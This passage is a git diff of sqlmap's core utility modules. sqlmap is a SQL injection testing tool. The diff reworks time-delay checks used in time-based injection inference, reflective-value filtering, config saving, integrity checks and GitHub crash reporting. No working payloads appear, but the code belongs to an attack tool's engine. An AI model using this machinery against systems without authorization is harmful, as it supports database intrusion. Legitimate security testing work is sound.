sqlmap to try to optimize value(s) " msg += "for DBMS delay responses (option '--time-sec')? [Y/n] " - choice = readInput(msg, default='Y') - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES + + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if not readInput(msg, default='Y', boolean=True) else ADJUST_TIME_DELAY.YES if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit) return retVal else: - return (threadData.lastQueryDuration - conf.timeSec) >= 0 + delta = threadData.lastQueryDuration - conf.timeSec + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): # MySQL's SLEEP(X) lasts 0.05 seconds shorter on average + delta += 0.05 + return delta >= 0 def adjustTimeDelay(lastQueryDuration, lowerStdLimit): """ @@ -2270,6 +2433,32 @@ def extractErrorMessage(page): return retVal +def findLocalPort(ports): + """ + Find the first opened localhost port from a given list of ports (e.g. 
for Tor port checks) + """ + + retVal = None + + for port in ports: + try: + try: + s = socket._orig_socket(socket.AF_INET, socket.SOCK_STREAM) + except AttributeError: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((LOCALHOST, port)) + retVal = port + break + except socket.error: + pass + finally: + try: + s.close() + except socket.error: + pass + + return retVal + def findMultipartPostBoundary(post): """ Finds value for a boundary parameter in given multipart POST body @@ -2282,6 +2471,7 @@ def findMultipartPostBoundary(post): for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""): _ = match.group(1).strip().strip('-') + if _ in done: continue else: @@ -2355,7 +2545,7 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False): # corner case when character % really needs to be # encoded (when not representing URL encoded char) # except in cases when tampering scripts are used - if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions: + if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions: value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value) while True: @@ -2412,17 +2602,19 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg): Logs HTTP traffic to the output file """ - if not conf.trafficFile: - return + if conf.harFile: + conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg) - with kb.locks.log: - dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) - dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) - dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) + if not conf.trafficFile: + with kb.locks.log: + dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) + dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) + dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) def getPageTemplate(payload, place): # Cross-linked function raise NotImplementedError +@cachedmethod def getPublicTypeMembers(type_, onlyValues=False): """ Useful for getting members from types (e.g. 
in enums) @@ -2431,12 +2623,16 @@ def getPublicTypeMembers(type_, onlyValues=False): ['Linux', 'Windows'] """ + retVal = [] + for name, value in inspect.getmembers(type_): - if not name.startswith('__'): + if not name.startswith("__"): if not onlyValues: - yield (name, value) + retVal.append((name, value)) else: - yield value + retVal.append(value) + + return retVal def enumValueToNameLookup(type_, value_): """ @@ -2485,9 +2681,12 @@ def extractTextTagContent(page): page = page or "" if REFLECTED_VALUE_MARKER in page: - page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + try: + page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + except MemoryError: + page = page.replace(REFLECTED_VALUE_MARKER, "") - return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) + return filter(None, (_.group("result").strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) def trimAlphaNum(value): """ @@ -2580,7 +2779,7 @@ def findDynamicContent(firstPage, secondPage): prefix = trimAlphaNum(prefix) suffix = trimAlphaNum(suffix) - kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH / 2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH / 2]) if suffix else None)) + kb.dynamicMarkings.append((prefix[-DYNAMICITY_MARK_LENGTH / 2:] if prefix else None, suffix[:DYNAMICITY_MARK_LENGTH / 2] if suffix else None)) if len(kb.dynamicMarkings) > 0: infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '') @@ -2599,11 +2798,11 @@ def removeDynamicContent(page): if prefix is None and suffix is None: continue elif prefix is None: - page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page) + page = re.sub(r"(?s)^.+%s" % re.escape(suffix), suffix.replace('\\', r'\\'), page) elif suffix is None: - page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page) + page = re.sub(r"(?s)%s.+$" % re.escape(prefix), prefix.replace('\\', r'\\'), page) else: - page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page) + page = re.sub(r"(?s)%s.+%s" % (re.escape(prefix), re.escape(suffix)), "%s%s" % (prefix.replace('\\', r'\\'), suffix.replace('\\', r'\\')), page) return page @@ -2677,7 +2876,7 @@ def parseSqliteTableSchema(value): table = {} columns = {} - for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): + for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): columns[match.group(1)] = match.group(2) table[conf.tbl] = columns @@ -2737,9 +2936,61 @@ def setOptimize(): conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) if not conf.nullConnection: - debugMsg = "turning off --null-connection switch used indirectly by switch -o" + debugMsg = "turning off switch '--null-connection' used indirectly by switch '-o'" logger.debug(debugMsg) +def saveConfig(conf, filename): + """ + Saves conf to configuration filename + """ + + 
config = UnicodeRawConfigParser() + userOpts = {} + + for family in optDict.keys(): + userOpts[family] = [] + + for option, value in conf.items(): + for family, optionData in optDict.items(): + if option in optionData: + userOpts[family].append((option, value, optionData[option])) + + for family, optionData in userOpts.items(): + config.add_section(family) + + optionData.sort() + + for option, value, datatype in optionData: + if datatype and isListLike(datatype): + datatype = datatype[0] + + if option in IGNORE_SAVE_OPTIONS: + continue + + if value is None: + if datatype == OPTION_TYPE.BOOLEAN: + value = "False" + elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): + if option in defaults: + value = str(defaults[option]) + else: + value = "0" + elif datatype == OPTION_TYPE.STRING: + value = "" + + if isinstance(value, basestring): + value = value.replace("\n", "\n ") + + config.set(family, option, value) + + with openFile(filename, "wb") as f: + try: + config.write(f) + except IOError, ex: + errMsg = "something went wrong while trying " + errMsg += "to write to the configuration file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + def initTechnique(technique=None): """ Prepares data for technique specified @@ -2796,7 +3047,13 @@ def unArrayizeValue(value): """ if isListLike(value): - value = value[0] if len(value) > 0 else None + if not value: + value = None + elif len(value) == 1 and not isListLike(value[0]): + value = value[0] + else: + _ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value))) + value = _[0] if len(_) > 0 else None return value @@ -2886,7 +3143,7 @@ def showHttpErrorCodes(): msg += "could mean that some kind of protection is involved (e.g. WAF)" logger.debug(msg) -def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): +def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436) """ Returns file handle of a given filename """ @@ -2917,7 +3174,17 @@ def decodeIntToUnicode(value): _ = "%x" % value if len(_) % 2 == 1: _ = "0%s" % _ - retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None) + raw = hexdecode(_) + + if Backend.isDbms(DBMS.MYSQL): + # https://github.com/sqlmapproject/sqlmap/issues/1531 + retVal = getUnicode(raw, conf.charset or UNICODE_ENCODING) + elif Backend.isDbms(DBMS.MSSQL): + retVal = getUnicode(raw, "UTF-16-BE") + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE): + retVal = unichr(value) + else: + retVal = getUnicode(raw, conf.charset) else: retVal = getUnicode(chr(value)) except: @@ -2925,6 +3192,42 @@ def decodeIntToUnicode(value): return retVal +def md5File(filename): + """ + Calculates MD5 digest of a file + Reference: http://stackoverflow.com/a/3431838 + """ + + checkFile(filename) + + digest = hashlib.md5() + with open(filename, "rb") as f: + for chunk in iter(lambda: f.read(4096), ""): + digest.update(chunk) + + return digest.hexdigest() + +def checkIntegrity(): + """ + Checks integrity of code files during the unhandled exceptions + """ + + if not paths: + return + + logger.debug("running code integrity check") + + retVal = True + for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)): + path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _)) + if not os.path.isfile(path): + logger.error("missing file detected '%s'" % path) + retVal = False + elif 
md5File(path) != checksum:
+            logger.error("wrong checksum of file '%s' detected" % path)
+            retVal = False
+    return retVal
+
 def unhandledExceptionMessage():
     """
     Returns detailed message about occurred unhandled exception
@@ -2941,9 +3244,18 @@ def unhandledExceptionMessage():
     errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:]
     errMsg += "Python version: %s\n" % PYVERSION
     errMsg += "Operating system: %s\n" % PLATFORM
-    errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
+    errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding))
     errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
-    errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
+    errMsg += "Back-end DBMS:"
+
+    if Backend.getDbms() is not None:
+        errMsg += " %s (fingerprinted)" % Backend.getDbms()
+
+    if Backend.getIdentifiedDbms() is not None and (Backend.getDbms() is None or Backend.getIdentifiedDbms() != Backend.getDbms()):
+        errMsg += " %s (identified)" % Backend.getIdentifiedDbms()
+
+    if not errMsg.endswith(')'):
+        errMsg += " None"
 
     return errMsg
 
@@ -2973,21 +3285,36 @@ def createGithubIssue(errMsg, excMsg):
     msg += "with the unhandled exception information at "
     msg += "the official Github repository? [y/N] "
     try:
-        test = readInput(msg, default="N")
+        choice = readInput(msg, default='N', boolean=True)
     except:
-        test = None
+        choice = None
 
-    if test and test[0] in ("y", "Y"):
+    if choice:
         ex = None
         errMsg = errMsg[errMsg.find("\n"):]
 
+        req = urllib2.Request(url="https://api.github.com/search/issues?q=%s" % urllib.quote("repo:sqlmapproject/sqlmap Unhandled exception (#%s)" % key))
+
+        try:
+            content = urllib2.urlopen(req).read()
+            _ = json.loads(content)
+            duplicate = _["total_count"] > 0
+            closed = duplicate and _["items"][0]["state"] == "closed"
+            if duplicate:
+                warnMsg = "issue seems to be already reported"
+                if closed:
+                    warnMsg += " and resolved. Please update to the latest "
+                    warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE
+                logger.warn(warnMsg)
+                return
+        except:
+            pass
 
         data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
         req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")})
 
         try:
-            f = urllib2.urlopen(req)
-            content = f.read()
+            content = urllib2.urlopen(req).read()
         except Exception, ex:
             content = None
 
@@ -3004,7 +3331,7 @@ def createGithubIssue(errMsg, excMsg):
         else:
             warnMsg = "something went wrong while creating a Github issue"
             if ex:
-                warnMsg += " ('%s')" % ex
+                warnMsg += " ('%s')" % getSafeExString(ex)
 
             if "Unauthorized" in warnMsg:
                warnMsg += ". 
Please update to the latest revision" logger.warn(warnMsg) @@ -3016,7 +3343,7 @@ def maskSensitiveData(msg): retVal = getUnicode(msg) - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): + for item in filter(None, map(lambda x: conf.get(x), SENSITIVE_OPTIONS)): regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item)) while extractRegexResult(regex, retVal): value = extractRegexResult(regex, retVal) @@ -3027,7 +3354,6 @@ def maskSensitiveData(msg): if match: retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) - if getpass.getuser(): retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal) @@ -3089,14 +3415,6 @@ def intersect(valueA, valueB, lowerCase=False): return retVal -def cpuThrottle(value): - """ - Does a CPU throttling for lesser CPU consumption - """ - - delay = 0.00001 * (value ** 2) - time.sleep(delay) - def removeReflectiveValues(content, payload, suppressWarning=False): """ Neutralizes reflective values in a given content based on a payload @@ -3105,59 +3423,86 @@ def removeReflectiveValues(content, payload, suppressWarning=False): retVal = content - if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode: - def _(value): - while 2 * REFLECTED_REPLACEMENT_REGEX in value: - value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) - return value + try: + if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode: + def _(value): + while 2 * REFLECTED_REPLACEMENT_REGEX in value: + value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) + return value - payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) + payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) + regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) - if regex != payload: - if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check - parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach + if regex != payload: + if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check + parts = regex.split(REFLECTED_REPLACEMENT_REGEX) + retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach - if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs - regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) + if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs + regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) - parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) + parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) - if regex.startswith(REFLECTED_REPLACEMENT_REGEX): - regex = 
r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) - else: - regex = r"\b%s" % regex + if regex.startswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) + else: + regex = r"\b%s" % regex - if regex.endswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) - else: - regex = r"%s\b" % regex + if regex.endswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) + else: + regex = r"%s\b" % regex - retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal) + _retVal = [retVal] + def _thread(regex): + try: + _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) - if len(parts) > 2: - regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) - retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal) + if len(parts) > 2: + regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) + _retVal[0] = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + except KeyboardInterrupt: + raise + except: + pass - if retVal != content: - kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 - if not suppressWarning: - warnMsg = "reflective value(s) found and filtering out" - singleTimeWarnMessage(warnMsg) + thread = threading.Thread(target=_thread, args=(regex,)) + thread.daemon = True + thread.start() + thread.join(REFLECTED_REPLACEMENT_TIMEOUT) - if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): - warnMsg = "frames detected containing attacked parameter values. Please be sure to " - warnMsg += "test those separately in case that attack on this page fails" - singleTimeWarnMessage(warnMsg) + if thread.isAlive(): + kb.reflectiveMechanism = False + retVal = content + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (because of timeouts)" + logger.debug(debugMsg) + else: + retVal = _retVal[0] - elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: - kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 - if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: - kb.reflectiveMechanism = False + if retVal != content: + kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (for optimization purposes)" - logger.debug(debugMsg) + warnMsg = "reflective value(s) found and filtering out" + singleTimeWarnMessage(warnMsg) + + if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): + warnMsg = "frames detected containing attacked parameter values. 
Please be sure to "
+                        warnMsg += "test those separately in case that attack on this page fails"
+                        singleTimeWarnMessage(warnMsg)
+
+            elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
+                kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
+                if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
+                    kb.reflectiveMechanism = False
+                    if not suppressWarning:
+                        debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
+                        logger.debug(debugMsg)
+    except MemoryError:
+        kb.reflectiveMechanism = False
+        if not suppressWarning:
+            debugMsg = "turning off reflection removal mechanism (because of low memory issues)"
+            logger.debug(debugMsg)
 
     return retVal
 
@@ -3194,7 +3539,7 @@ def safeSQLIdentificatorNaming(name, isTable=False):
             retVal = "\"%s\"" % retVal.strip("\"")
         elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
             retVal = "\"%s\"" % retVal.strip("\"").upper()
-        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and not re.match(r"\A\w+\Z", retVal, re.U):
+        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
             retVal = "[%s]" % retVal.strip("[]")
 
         if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
@@ -3401,16 +3746,35 @@ def randomizeParameterValue(value):
     value = re.sub(r"%[0-9a-fA-F]{2}", "", value)
 
     for match in re.finditer('[A-Z]+', value):
-        retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
+        while True:
+            original = match.group()
+            candidate = randomStr(len(match.group())).upper()
+            if original != candidate:
+                break
+
+        retVal = retVal.replace(original, candidate)
 
     for match in re.finditer('[a-z]+', value):
-        retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower())
+        while True:
+            original = match.group()
+            candidate = randomStr(len(match.group())).lower()
+            if original != candidate:
+                break
+
+        retVal = retVal.replace(original, candidate)
 
     for match in re.finditer('[0-9]+', value):
-        retVal = retVal.replace(match.group(), str(randomInt(len(match.group()))))
+        while True:
+            original = match.group()
+            candidate = str(randomInt(len(match.group())))
+            if original != candidate:
+                break
+
+        retVal = retVal.replace(original, candidate)
 
     return retVal
 
+@cachedmethod
 def asciifyUrl(url, forceQuote=False):
     """
     Attempts to make a unicode URL usable with ``urllib/urllib2``.
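The reworked removeReflectiveValues() hunk above runs the potentially expensive re.sub() call in a daemon thread joined on REFLECTED_REPLACEMENT_TIMEOUT, and falls back to the untouched content when the worker does not finish in time. A standalone sketch of that pattern (the helper name and the 3-second timeout are illustrative, not taken from sqlmap's settings):

    import re
    import threading

    def bounded_sub(pattern, repl, text, timeout=3):
        # run the substitution in a worker thread so a pathological regex
        # cannot stall the caller indefinitely
        result = [text]

        def worker():
            try:
                result[0] = re.sub(pattern, repl, result[0])
            except Exception:
                pass

        thread = threading.Thread(target=worker)
        thread.daemon = True
        thread.start()
        thread.join(timeout)

        # if the worker is still busy, give up and keep the original text
        return text if thread.is_alive() else result[0]

    print(bounded_sub(r"(?i)foo\w*", "__MARKER__", "Foobar baz"))  # __MARKER__ baz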
@@ -3470,14 +3834,19 @@ def asciifyUrl(url, forceQuote=False): netloc = ':' + password + netloc netloc = username + netloc - if parts.port: - netloc += ':' + str(parts.port) + try: + port = parts.port + except: + port = None + + if port: + netloc += ':' + str(port) return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) def isAdminFromPrivileges(privileges): """ - Inspects privileges to see if those are comming from an admin user + Inspects privileges to see if those are coming from an admin user """ # In PostgreSQL the usesuper privilege means that the @@ -3498,7 +3867,6 @@ def isAdminFromPrivileges(privileges): # In Firebird there is no specific privilege that means # that the user is DBA - # TODO: confirm retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE"))) return retVal @@ -3528,7 +3896,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False): try: forms = ParseResponse(response, backwards_compat=False) - except UnicodeError: + except (UnicodeError, ValueError): pass except ParseError: if ">> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target.com/images/page2.php') + True + >>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target2.com/images/page2.php') + False + """ + + if not urls: + return None + elif len(urls) == 1: + return True + else: + return all(urlparse.urlparse(url or "").netloc.split(':')[0] == urlparse.urlparse(urls[0] or "").netloc.split(':')[0] for url in urls[1:]) + def getHostHeader(url): """ Returns proper Host header value for a given target URL @@ -3662,12 +4052,19 @@ def evaluateCode(code, variables=None): except KeyboardInterrupt: raise except Exception, ex: - errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message + errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) raise SqlmapGenericException(errMsg) def serializeObject(object_): """ Serializes given object + + >>> serializeObject([1, 2, 3, ('a', 'b')]) + 'gAJdcQEoSwFLAksDVQFhVQFihnECZS4=' + >>> serializeObject(None) + 'gAJOLg==' + >>> serializeObject('foobar') + 'gAJVBmZvb2JhcnEBLg==' """ return base64pickle(object_) @@ -3678,6 +4075,8 @@ def unserializeObject(value): >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3] True + >>> unserializeObject('gAJVBmZvb2JhcnEBLg==') + 'foobar' """ return base64unpickle(value) if value else None @@ -3724,14 +4123,20 @@ def decodeHexValue(value, raw=False): >>> decodeHexValue('3132332031') u'123 1' + >>> decodeHexValue(['0x31', '0x32']) + [u'1', u'2'] """ retVal = value def _(value): retVal = value - if value and isinstance(value, basestring) and len(value) % 2 == 0: - retVal = hexdecode(retVal) + if value and isinstance(value, basestring): + if len(value) % 2 != 0: + retVal = "%s?" 
% hexdecode(value[:-1]) if len(value) > 1 else value + singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) + else: + retVal = hexdecode(value) if not kb.binaryField and not raw: if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): @@ -3805,7 +4210,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None - if not kb.inferenceMode and not kb.fileReadMode and any(_ in (retVal or "") for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): + if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): retVal = None return retVal @@ -3824,11 +4229,11 @@ def resetCookieJar(cookieJar): content = readCachedFileContent(conf.loadCookies) lines = filter(None, (line.strip() for line in content.split("\n") if not line.startswith('#'))) - handle, filename = tempfile.mkstemp(prefix="sqlmapcj-") + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR) os.close(handle) # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html - with open(filename, "w+b") as f: + with openFile(filename, "w+b") as f: f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES) for line in lines: _ = line.split("\t") @@ -3862,13 +4267,18 @@ def decloakToTemp(filename): """ content = decloak(filename) - _ = os.path.split(filename[:-1])[-1] + + _ = utf8encode(os.path.split(filename[:-1])[-1]) + prefix, suffix = os.path.splitext(_) prefix = prefix.split(os.extsep)[0] + handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) os.close(handle) + with open(filename, "w+b") as f: f.write(content) + return filename def prioritySortColumns(columns): @@ -3891,8 +4301,11 @@ def getRequestHeader(request, name): """ retVal = None + if request and name: - retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items()) + _ = name.upper() + retVal = max([value if _ == key.upper() else None for key, value in request.header_items()]) + return retVal def isNumber(value): @@ -3969,3 +4382,18 @@ def pollProcess(process, suppress_errors=False): dataToStdout(" quit unexpectedly with return code %d\n" % returncode) break + +def getSafeExString(ex, encoding=None): + """ + Safe way how to get the proper exception represtation as a string + (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) + """ + + retVal = ex + + if getattr(ex, "message", None): + retVal = ex.message + elif getattr(ex, "msg", None): + retVal = ex.msg + + return getUnicode(retVal or "", encoding=encoding).strip() diff --git a/lib/core/convert.py b/lib/core/convert.py old mode 100644 new mode 100755 index 8f7123a00..802d00cfb --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -1,17 +1,26 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +try: + import cPickle as pickle +except: + import pickle +finally: + import pickle as picklePy + import base64 import json -import pickle +import re +import StringIO import sys from lib.core.settings import IS_WIN from lib.core.settings import UNICODE_ENCODING 
